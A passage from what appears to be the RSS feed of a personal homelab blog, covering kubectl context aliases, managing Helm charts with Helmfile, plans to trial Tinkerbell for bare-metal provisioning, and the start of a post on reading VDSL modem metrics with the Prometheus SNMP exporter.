started to question this decision, and I would suggest that anyone looking to replicate
my setup does not re-use an old alias like this, because inevitably, you will be using
the main cluster&rsquo;s alias even though you meant to talk to the management cluster.</p>
<p>Using <code>k</code> when wanting to do something with the k8s cluster has become pretty
ingrained over the last year+.</p>
<p>One random comment for when you&rsquo;re using a similar setup with autocompletion:
Don&rsquo;t surround the alias definition with quotation marks, e.g. like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>alias k<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;kubectl --context=main-admin@main-cluster&#34;</span>
</span></span></code></pre></div><p>The alias itself will work, but autocomplete won&rsquo;t. That&rsquo;s why I&rsquo;m using the <code>\ </code>
syntax instead. Apropos autocomplete, you need to explicitly tell bash to
autocomplete on aliases. For example like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>source ~/.kube/kubectl-comp
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#66d9ef">$(</span>type -t compopt<span style="color:#66d9ef">)</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;builtin&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    complete -o default -F __start_kubectl k k-master
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    complete -o default -o nospace -F __start_kubectl k k-master
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span></code></pre></div><p>The <code>__start_kubectl</code> function is defined in the autocomplete script provided
by kubectl when running <code>kubectl completion bash</code>.</p>
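<p>The completion file sourced above is simply the output of that command, written
to a file once, along these lines:</p>
<pre tabindex="0"><code># Generate the bash completion script once and store it where .bashrc sources it
kubectl completion bash &gt; ~/.kube/kubectl-comp
</code></pre>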
<p>Finally, I wrote about how I&rsquo;m using Helmfile to manage the deployments on my
Kubernetes cluster in the <a href="https://blog.mei-home.net/posts/helmfile/">last post</a>.
Luckily, Helmfile already has an option to set the context right in the Helmfile:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">helmDefaults</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeContext</span>: <span style="color:#ae81ff">main-admin@main-cluster</span>
</span></span></code></pre></div><p>This removes any danger of deploying to the wrong cluster, although commands
like <code>destroy</code> might still be dangerous when I&rsquo;ve got entries with the same names
in both files. &#x1f62c;</p>
<h2 id="finale">Finale</h2>
<p>And that completes this part of the setup. The next one will be about the setup
of Tinkerbell itself, and I will likely combine it with the provisioning of the
first VM with Tinkerbell.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Organizing Helm charts and other Manifests with Helmfile</title>
      <link>https://blog.mei-home.net/posts/helmfile/</link>
      <pubDate>Thu, 05 Jun 2025 21:20:53 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/helmfile/</guid>
      <description>How to organize and handle it all?</description>
      <content:encoded><![CDATA[<p>Wherein I describe how I organize Helm charts and other k8s manifests.</p>
<p>I&rsquo;ve had this post lying around in my drafts folder for a long, long time.
Mostly because I started writing it before I realized how useful it is to write
posts very close to when something happens.</p>
<p>The &ldquo;something happens&rdquo; in this case is the answer to the question &ldquo;How to
organize my Helm charts and other k8s manifests?&rdquo;. I liked Helm fine enough when
I looked at it. It&rsquo;s pretty nice to get all necessary manifests to run an app,
instead of having to write all of them myself.
But the question then was: How to store which exact Helm charts I have
installed, and in which version? And how/where to store the <code>values.yaml</code> files?
And then, what about random manifests, like additional PriorityClasses?</p>
<p>The solution that was pointed out to me on the Fediverse: <a href="https://github.com/helmfile/helmfile">Helmfile</a>.
It&rsquo;s a tool that reads a declarative list of Helm charts to be
installed and deploys them onto a cluster. It does not re-implement Helm, but
simply calls a previously installed Helm binary.</p>
<p>All of the configuration for Helmfile is stored in a local Yaml file. A
good example for what that config looks like is my <a href="https://cloudnative-pg.io/">CloudNativePG</a>
setup. Helmfile by default reads the config from a file named <code>helmfile.yaml</code>
in the current working dir. My <code>helmfile.yaml</code>, stripped down only to the
CNPG setup, looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">repositories</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cloud-native-pg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">url</span>: <span style="color:#ae81ff">https://cloudnative-pg.github.io/charts</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">releases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cnpg-operator</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">cloud-native-pg/cloudnative-pg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">v0.21.2</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">cnpg-operator</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./cnpg-operator/hl-values.yaml.gotmpl</span>
</span></span></code></pre></div><p>And the <code>hl-values.yaml.gotmpl</code> is then just the <code>values.yaml</code> file for the
CNPG Helm chart. With one additional wrinkle: Helmfile can do templating on the
<code>values.yaml</code> file. Which is pretty cool. Just one example of how I&rsquo;m using this
is my <a href="https://external-secrets.io/latest/">external-secrets</a> addon <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">caBundle</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  {{- exec &#34;curl&#34; (list &#34;https://vault.example.com:8200/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span></code></pre></div><p>Then in turn, I&rsquo;m writing that to a Secret:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-ca-cert</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">stringData</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caCert</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {{- .Values.caBundle | nindent 6 }}</span>
</span></span></code></pre></div><p>The curl command runs on the machine where Helmfile is executed. This
is particularly nice when you&rsquo;re fetching Secrets via this mechanism, because
it allows you to use local credentials that only exist on that single machine.</p>
<p>Once you&rsquo;ve entered a release into the Helmfile, it can be deployed with a
command like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>helmfile apply --selector name<span style="color:#f92672">=</span>cnpg-operator
</span></span></code></pre></div><p>This will automatically update all repositories and then run <code>helm upgrade</code>.
Very helpfully, it will also output the diff between the new release and what&rsquo;s
currently deployed on the cluster.</p>
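<p>The diff can also be requested on its own, without applying anything. Note that
this relies on the helm-diff plugin being installed. A quick sketch:</p>
<pre tabindex="0"><code># Show what would change for a single release, without deploying anything
helmfile diff --selector name=cnpg-operator
</code></pre>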
<p>Besides working with Helm charts directly, you can also just throw a couple of
manifests into a directory and deploy it the same way. I&rsquo;m doing this for my
own priority classes for example. I just have them in a directory <code>hl-common/</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ls hl-common/
</span></span><span style="display:flex;"><span>prio-hl-critical.yaml  prio-hl-external.yaml
</span></span></code></pre></div><p>Helmfile will then use <a href="https://github.com/helmfile/chartify">Chartify</a> to
turn those loose files into an ad-hoc chart and deploy it.</p>
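<p>Because Chartify turns the directory into a regular chart under the hood, the
rendered manifests can be previewed like any other release. Sketched here assuming
the directory is referenced by a release named <code>hl-common</code>:</p>
<pre tabindex="0"><code># Render the ad-hoc chart locally without touching the cluster
helmfile template --selector name=hl-common
</code></pre>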
<p>The <code>release[].values[]</code> list is also a pretty useful feature. It allows setting
Helm chart values right in the Helmfile instead of a separate <code>values.yaml</code>.
I don&rsquo;t use this too much, as I like having all configs neatly in one file. But
I like using this approach in one instance, namely for <code>appVersion</code>-like values
on Helm charts I wrote myself. Here&rsquo;s an example from my Audiobookshelf entry:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">audiobookshelf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">./audiobookshelf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">audiobookshelf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">appVersion</span>: <span style="color:#e6db74">&#34;2.23.0&#34;</span>
</span></span></code></pre></div><p>The fact that I have the appVersion in the Helmfile directly makes it a lot more
convenient when I do my regular service update rounds. Unless something deeper
changed, I just need to have my Helmfile open during Service Upgrade Friday and
either update the chart version or the <code>appVersion</code> right there, without having
to switch between all of the <code>values.yaml</code> or <code>Chart.yaml</code> files.</p>
<p>For my standard approach, I&rsquo;m currently working with two release entries when
using a 3rd party chart. Let&rsquo;s look at my <a href="https://forgejo.org/">Forgejo</a>
deployment as an example:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">repositories</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">url</span>: <span style="color:#ae81ff">code.forgejo.org/forgejo-helm</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">oci</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">releases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">forgejo/forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">12.5.1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./forgejo/hl-values.yaml.gotmpl</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-addons</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">./forgejo-addons</span>
</span></span></code></pre></div><p>In this approach, the <code>forgejo/hl-values.yaml.gotmpl</code> file is the <code>values.yaml</code>
file for the Forgejo chart. But, in most instances, 3rd party charts don&rsquo;t
contain everything I need. One example which comes up almost every single time
are additional ExternalSecret manifests for credentials, or ObjectBucketClaims
for S3 buckets in my Ceph cluster. And those Yaml files need to go somewhere.</p>
<p>And that&rsquo;s what the <code>$chartname-addon</code> chart is for. It&rsquo;s a normal Helm chart,
including <code>Chart.yaml</code> and <code>templates/</code> directory. It also gets its own <code>values.yaml</code>
file. It gets deployed into the same Namespace as the primary chart.</p>
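<p>To make that a bit more concrete, this is roughly what such an addons chart looks
like on disk; the file names are just illustrative:</p>
<pre tabindex="0"><code>ls -R forgejo-addons/
forgejo-addons/:
Chart.yaml  values.yaml  templates

forgejo-addons/templates:
external-secrets.yaml  object-bucket-claims.yaml
</code></pre>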
<p>I also trialed a different approach with some of my earliest charts. For those,
I created a &ldquo;parent&rdquo; chart, which contained the <code>Chart.yaml</code> and any additional
manifests on top of the 3rd party chart. Then said 3rd party chart got added
as a dependency. But I found the separation between the 3rd party chart and my own
manifests in the <code>$chartname-addons</code> approach more appealing. There was also the
fact that I couldn&rsquo;t just update the version of the 3rd party chart and then
deploy - Helm would always error out because the <code>Chart.lock</code> file was
outdated. So I moved away from this model completely.</p>
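<p>For reference, the extra step that approach required after every chart version
bump was regenerating the lock file, roughly like this (the chart path is just
illustrative):</p>
<pre tabindex="0"><code># Re-resolve the dependency and rewrite Chart.lock after bumping the version
helm dependency update ./forgejo
</code></pre>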
<h2 id="why-not-gitops">Why not GitOps?</h2>
<p>So the obvious question might be: Why not employ GitOps like Argo or Flux?
Mostly: Time. &#x1f601; I&rsquo;m not averse to adding additional complexity to my
Homelab just for the fun of it. But a GitOps tool should have its own management
cluster, as it wouldn&rsquo;t make much sense to me to have e.g. ArgoCD running in
the same cluster that it&rsquo;s managing. So I skipped this option when I initially
looked for how I wanted to manage it all.</p>
<p>There&rsquo;s also the additional hassle of &ldquo;Okay, and then where will I store the
repo and execute the automation?&rdquo;. I have a Forgejo instance and Woodpecker as
CI, but both of those are deployed in my main cluster. So they would be controlled
by ArgoCD - which they would also be hosting.
But on the other hand, there&rsquo;s also the challenge of coming up with something
reasonably small that can serve ArgoCD without being too much of a hassle.</p>
<p>Finally, there&rsquo;s also my current workflow: I generally work on a thing until it
works properly, and then it gets a commit in the Homelab repo. It would feel a
bit weird to make a commit for every thing I change, for no other reason than
that I need said commit to trigger a new deployment. I&rsquo;m used to this approach
from work, but there the CI triggers hundreds upon hundreds of jobs and tens of
thousands of tests. It is literally impossible to run the software on our
developer machines. But here? Making a commit for every change, pushing it just
to make a test deploy - it just feels a bit much?</p>
<p>All of the above being said - I&rsquo;d really like to hear what those of you who do
run GitOps tools to manage your cluster get out of it. What advantages does it
have for you? And what&rsquo;s your workflow? Do you perhaps always work with Helm
locally, and then let Argo do its thing once everything already works? Ping me
<a href="https://social.mei-home.net/@mmeier">on the Fediverse</a>. I&rsquo;m genuinely curious.
And quite frankly, I want to be convinced - one more project for the Homelab
pile. &#x1f601;</p>
<h2 id="finale">Finale</h2>
<p>And that&rsquo;s it already for this one. I&rsquo;ve had it sitting in draft state for way
too long.</p>
<p>The next post will likely be on the setup of the tinkerbell lab, as I&rsquo;m done
with that now and have already deployed tinkerbell - but it&rsquo;s not working properly
yet.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part I: The Plan</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-1-plan/</link>
      <pubDate>Thu, 29 May 2025 12:00:13 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-1-plan/</guid>
      <description>Intro to the Tinkerbell deployment</description>
      <content:encoded><![CDATA[<p>A rough overview of my plan for trialing tinkerbell in my Homelab.</p>
<p>This is part 1 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">tinkerbell series</a>.</p>
<p>I&rsquo;m planning to trial <a href="https://tinkerbell.org/">tinkerbell</a> in my Homelab to
improve my baremetal provisioning setup. This first post covers the plan and
the reasons why I&rsquo;m doing this.</p>
<p>Tinkerbell is a system for provisioning baremetal machines. It is deployed into
a Kubernetes cluster and consists of a controller, a DHCP/netboot server, a
metadata provider e.g. for cloud-init data, and an in-memory OS for running
workflows. The basic idea is that new machines netboot into that in-memory OS
and execute workflows configured in tinkerbell to install the actual OS.</p>
<h2 id="the-current-provisioning-setup">The current provisioning setup</h2>
<p>Before going into detail on the plan for the future, let&rsquo;s have a look at what
my provisioning pipeline currently looks like.</p>
<p>The first step of any setup is to create an individual disk image for the new machine.
I&rsquo;ve standardized on Ubuntu server for all of my Homelab hosts, as it supports
Raspberry Pis well and thus allows me to run the same Linux distro on the entire
Homelab. The image generation varies a bit between Pis and x86 hosts. But both
use HashiCorp&rsquo;s <a href="https://developer.hashicorp.com/packer">Packer</a> to create
an image, followed by a short Ansible playbook which prepares the image for
further provisioning with my main Ansible playbook.</p>
<p>For my Pis, this preparation is done in a chroot with qemu-arm-static, based
on Ubuntu&rsquo;s preinstalled Pi images. For x86 hosts, a normal Ubuntu install is
run in a Qemu VM. Once the image is prepared, I stick a USB drive into the new
host and <code>dd</code> the image onto the disk, either a local disk or a Ceph RBD, depending
on whether it&rsquo;s a diskless host or not.</p>
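<p>Just to illustrate how manual that last step is, it boils down to something like the
following (a sketch only - the image name and target device are placeholders, and for a
diskless host the target would be the mapped RBD instead):</p>
<pre tabindex="0"><code># example only: write the prepared image onto the target disk of the new host
dd if=ubuntu-host01.img of=/dev/sda bs=4M status=progress conv=fsync
</code></pre>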
<p>And this, overall, seems rather unnecessarily complicated and manual. First of
all, the short Ansible playbook I run to prepare the image for further provisioning
only does the following:</p>
<ul>
<li>Installs a couple of packages Ansible needs to run, e.g. Python</li>
<li>Adds my standard Homelab Ansible user, sets up <code>sudo</code> and deploys the SSH key</li>
<li>Sets the hostname</li>
</ul>
<p>For netbooting hosts, it does a few more things:</p>
<ul>
<li>Sets the boot partition to point to the correct NFS mount</li>
<li>Sets the kernel command line to mount the right RBD</li>
</ul>
<p>Most of these steps could be done via <a href="https://cloud-init.io/">cloud-init</a>, removing
the need to generate individual images per host entirely. This is one big goal
of the tinkerbell introduction: Getting rid of per-host images and ending up with
only two base images, one for Pis and one for x86 hosts.</p>
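<p>As a rough sketch of what that could look like, here is a minimal cloud-init user-data
file covering those preparation steps (user name, key and hostname are placeholders, not my
actual config):</p>
<pre tabindex="0"><code>#cloud-config
# placeholder values - the per-host bits cloud-init could take over
hostname: node01
packages:
  - python3
users:
  - name: ansible
    sudo: ALL=(ALL) NOPASSWD:ALL
    ssh_authorized_keys:
      - ssh-ed25519 AAAA... ansible@homelab
</code></pre>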
<p>In addition, I&rsquo;m hoping that tinkerbell&rsquo;s workflows allow me to also automate the
image install, so I can also get rid of the need to boot from a USB stick and do
it manually.</p>
<h2 id="the-plan">The plan</h2>
<p>I recently bought a couple of Raspberry Pi 5 to replace my Kubernetes control
plane nodes. When I did so, I ordered one additional Pi, with 16 GB of RAM and
a 1 TB SSD. That Pi will soon replace what I call my &ldquo;Cluster Master&rdquo;. It&rsquo;s a
host explicitly intended to be bootable and run its services without any external
dependencies. It, in turn, then hosts foundational services for the rest of the Homelab.
That machine will host a new Kubernetes cluster for tinkerbell.</p>
<p>But I will not jump right into that setup. Instead, I plan to first make a setup
on my desktop with a couple of VMs to kick the tires on tinkerbell, because there
are a couple of open questions:</p>
<ol>
<li>How exactly does the DHCP server behave? Does it run in proxy mode? Does it
have to be the only DHCP server in the subnet?</li>
<li>How does tinkerbell work in general?</li>
<li>Can I make tinkerbell work with Pi 4? What about Pi 5?</li>
<li>Can I make tinkerbell work with my netboot setup?</li>
</ol>
<p>All of these will be answered in the experimental phase. The general answer to
question 3), at least for Pi 4, seems to be &ldquo;Eh, possibly&rdquo;. This is also the
biggest stumbling block I see. As I noted above, tinkerbell runs an in-memory OS
to execute its workflow for installing the main OS. So the main challenge will be
to get the Pis booted into that OS. But then again, the Pi netboot can already
boot into a given kernel and initramfs. So unless tinkerbell somehow has a hard
requirement on iPXE boot, I should be able to somehow get it to work on the Pis.
I expect this to be the most fun part of the entire endeavor. &#x1f913;</p>
<p>For this experimentation phase, I intend to set up a lab environment on my desktop.
I decided to do this for two reasons:</p>
<ol>
<li>I need to isolate it from the Homelab for now, due to tinkerbell running a DHCP
server</li>
<li>My past work on netboot has shown that doing the experimentation on a VM you
can easily interact with has a huge advantage</li>
</ol>
<p>I actually thought a lot about how to manage the VMs for this setup on my desktop.
I got burned pretty hard by VirtualBox in the past, so that was out. The last
time I set up a VM lab on my desktop, I used Qemu directly, with a bit of bash
scripting around it. See <a href="https://blog.mei-home.net/posts/testvm-for-netbooting/">this post</a>
if you&rsquo;re interested. What I was looking for this time was something in between
&ldquo;needs a daemon running&rdquo; and &ldquo;big ball of bash&rdquo;.
I looked at <a href="https://developer.hashicorp.com/vagrant">HashiCorp&rsquo;s Vagrant</a> at
first, and will give it a try with the <a href="https://github.com/ppggff/vagrant-qemu">QEMU provider</a>.
If that does not work out for some reason, I will instead use <a href="https://linuxcontainers.org/incus/">Incus</a>.
It&rsquo;s a bit more than I really want to set up on my desktop, but on the other hand
I&rsquo;m pretty familiar with LXD VMs.
The big advantage of Vagrant is that there&rsquo;s no daemon running, and I get
version-controllable configs out of the box. For Incus, I&rsquo;d also set up OpenTofu,
so I could put the config under version control, instead of ending up with a docs
page listing the CLI commands to execute in order to set it all up.</p>
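<p>In case anyone wants to follow along: from what I have read so far, getting the QEMU
provider going should roughly amount to installing the plugin and bringing the box up with
it, something like this (untested on my end, so treat it as an assumption):</p>
<pre tabindex="0"><code># install the third-party QEMU provider plugin, then start the VM with it
vagrant plugin install vagrant-qemu
vagrant up --provider=qemu
</code></pre>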
<p>Once that&rsquo;s done, I will have to set up a Kubernetes cluster on the VM to install
tinkerbell into. I&rsquo;m currently planning to use k3s, as it seems to be the default
choice for single node clusters.</p>
<p>This setup will happen regardless of whether I ultimately deploy tinkerbell or not.
My main reason is that I&rsquo;d like to just standardize as much as possible on
deploying everything with Kubernetes, even outside the main cluster. This will
also entail looking to deploy the apps currently running baremetal on my Master.
The main one is DNSmasq, providing a TFTP boot server for my diskless hosts.
But I also have further plans for a &ldquo;management&rdquo; style Kubernetes cluster. Namely,
I want to try out GitOps for my main Kubernetes cluster, for example with ArgoCD,
which also calls for a separate cluster setup. And finally, I would like to
trial Cluster API, just for the fun of it.</p>
<p>For the Kubernetes distribution, as mentioned, I settled on k3s. It&rsquo;s supposed to be
relatively lightweight, and it seems to run quite nicely in a single-node setup from what
I&rsquo;ve read.</p>
<p>So overall, the plan entails the following steps:</p>
<ol>
<li>Create a new VLAN to properly isolate the tinkerbell experiment, and specifically
its DHCP server</li>
<li>Set up a VM with Vagrant or Incus on my desktop for experimentation</li>
<li>Create a k3s single-node cluster on the VM</li>
<li>Install tinkerbell in the cluster</li>
<li>Kick the tires for provisioning a second VM</li>
<li>Try to get provisioning working on a Pi 4 and a Pi 5</li>
<li>If everything works, deploy it in the Homelab</li>
</ol>
<p>And that&rsquo;s it already on the planning front. This is a lot more experimental
than my Kubernetes migration was, so there&rsquo;s not that much to plan up front. I
didn&rsquo;t need a single flow chart. &#x1f601;</p>
<p>Next will be a post on the lab setup on my desktop, once I&rsquo;ve got that running.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Gathering SNMP Metrics with the SNMP Exporter</title>
      <link>https://blog.mei-home.net/posts/snmp-exporter/</link>
      <pubDate>Sun, 25 May 2025 22:20:55 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/snmp-exporter/</guid>
      <description>Gathering metrics from a DrayTek VDSL modem</description>
      <content:encoded><![CDATA[<p>I have been gathering metrics from my <a href="https://www.draytek.de/vigor165.html">DrayTek Vigor 165 modem</a> for a while now,
and finally got around to documenting the setup, so now you get to read about it.</p>
<p>I&rsquo;m using the Vigor 165 to connect to the Internet via a Deutsche Telekom
250 Mbit/s VDSL connection. That modem supports SNMP and can provide metrics
like the line speed or quality. A couple of years back, I wanted to get that
data into my Grafana dashboards. After some searching, I came across the
<a href="https://github.com/prometheus/snmp_exporter">SNMP Exporter</a>.</p>
<p>The way the exporter works is that, on every Prometheus scrape, it makes SNMP requests
to the configured target and returns the data in the standard Prometheus format. And because
it involves SNMP, the setup is a bit more involved than for your average exporter.</p>
<h2 id="snmp">SNMP</h2>
<p>SNMP is the <a href="https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol">Simple Network Management Protocol</a>.
As the name implies, the protocol is intended for managing networking devices,
like modems or routers. I&rsquo;ve never worked professionally in the networking area,
so I don&rsquo;t have any experience with actively managing network devices like switches
via SNMP. And as far as I&rsquo;m aware, my modem is the only device that supports
SNMP in my Homelab. So I won&rsquo;t be discussing the configuration part here, only the
read-only part my modem uses for providing metrics.</p>
<p>Information in SNMP is organized according to management information base (MIB)
files, which specify what variables are available, and their hierarchy. Here is
one such file, defining the variables for VDSL information: <a href="https://github.com/librenms/librenms/blob/master/mibs/VDSL2-LINE-MIB">VDSL2-LINE-MIB</a>.
While these files can be read by humans, I always kept to websites like
<a href="https://mibs.observium.org/">observium</a> for browsing them.</p>
<p>I think for the purposes of understanding the format, an example result from
querying my modem is going to be more illuminating than me trying to describe what
SNMP queries look like:</p>
<pre tabindex="0"><code>snmpbulkwalk -v 2c -c example 203.0.113.1
IF-MIB::ifType.1 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.4 = INTEGER: vdsl2(251)
IF-MIB::ifType.5 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.6 = INTEGER: propVirtual(53)
IF-MIB::ifType.7 = INTEGER: propVirtual(53)
IF-MIB::ifType.8 = INTEGER: propVirtual(53)
IF-MIB::ifType.9 = INTEGER: propVirtual(53)
IF-MIB::ifType.10 = INTEGER: propVirtual(53)
IF-MIB::ifType.11 = INTEGER: propVirtual(53)
IF-MIB::ifType.12 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.13 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifMtu.1 = INTEGER: 1500
IF-MIB::ifMtu.4 = INTEGER: 1500
IF-MIB::ifMtu.5 = INTEGER: 1500
IF-MIB::ifMtu.6 = INTEGER: 1500
IF-MIB::ifMtu.7 = INTEGER: 1500
IF-MIB::ifMtu.8 = INTEGER: 1500
IF-MIB::ifMtu.9 = INTEGER: 1500
IF-MIB::ifMtu.10 = INTEGER: 1500
IF-MIB::ifMtu.11 = INTEGER: 1500
IF-MIB::ifMtu.12 = INTEGER: 1500
IF-MIB::ifMtu.13 = INTEGER: 1500
IF-MIB::ifSpeed.1 = Gauge32: 1000000000
IF-MIB::ifSpeed.4 = Gauge32: 292016000
IF-MIB::ifSpeed.5 = Gauge32: 1000000000
IF-MIB::ifSpeed.6 = Gauge32: 0
IF-MIB::ifSpeed.7 = Gauge32: 0
IF-MIB::ifSpeed.8 = Gauge32: 0
IF-MIB::ifSpeed.9 = Gauge32: 1000000000
IF-MIB::ifSpeed.10 = Gauge32: 1000000000
IF-MIB::ifSpeed.11 = Gauge32: 1000000000
IF-MIB::ifSpeed.12 = Gauge32: 1000000000
IF-MIB::ifSpeed.13 = Gauge32: 1000000000
</code></pre><p>The <code>snmpbulkwalk</code> command has the advantage over other SNMP commands that it
just walks everything the target has to offer, instead of having to provide the
OIDs (Object Identifiers) to be queried explicitly.</p>
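<p>For comparison, querying a single value with <code>snmpget</code> means knowing the exact
OID or name up front (the value here is just the <code>ifSpeed.4</code> reading from the walk
above):</p>
<pre tabindex="0"><code>snmpget -v 2c -c example 203.0.113.1 IF-MIB::ifSpeed.4
IF-MIB::ifSpeed.4 = Gauge32: 292016000
</code></pre>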
<p>The above output shows a couple of values from my modem, regarding the setup
of its network interfaces. You can for example see that interface <code>.4</code> is the
VDSL interface, while <code>.1</code>, <code>.5</code> are Ethernet interfaces. The <code>ifSpeed</code> object then
shows the speed. The <code>-v 2c</code> parameter in the command sets the SNMP version
to be used, while <code>-c example</code> defines the <code>community</code>, which acts as a
sort of shared identifier between client and device.</p>
<p>SNMP itself, until version 3, does not support any kind of authentication at all.
So none needs to be provided. As my modem only supports querying but not configuration,
that&rsquo;s okay.</p>
<p>The interesting information for me comes a bit later in the output of the same
command:</p>
<pre tabindex="0"><code>[...]
SNMPv2-SMI::transmission.94.1.1.3.1.7.4 = INTEGER: -3
SNMPv2-SMI::transmission.94.1.1.3.1.8.4 = Gauge32: 51374000
SNMPv2-SMI::transmission.94.1.1.4.1.1.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.4.1.2.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.4.1.3.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.4.1.4.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.5.1.1.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.5.1.2.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.5.1.3.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.5.1.4.4 = Gauge32: 0
SNMPv2-SMI::transmission.251.1.2.2.1.1.4.2 = INTEGER: 2
SNMPv2-SMI::transmission.251.1.2.2.1.2.4.1 = Gauge32: 292016000
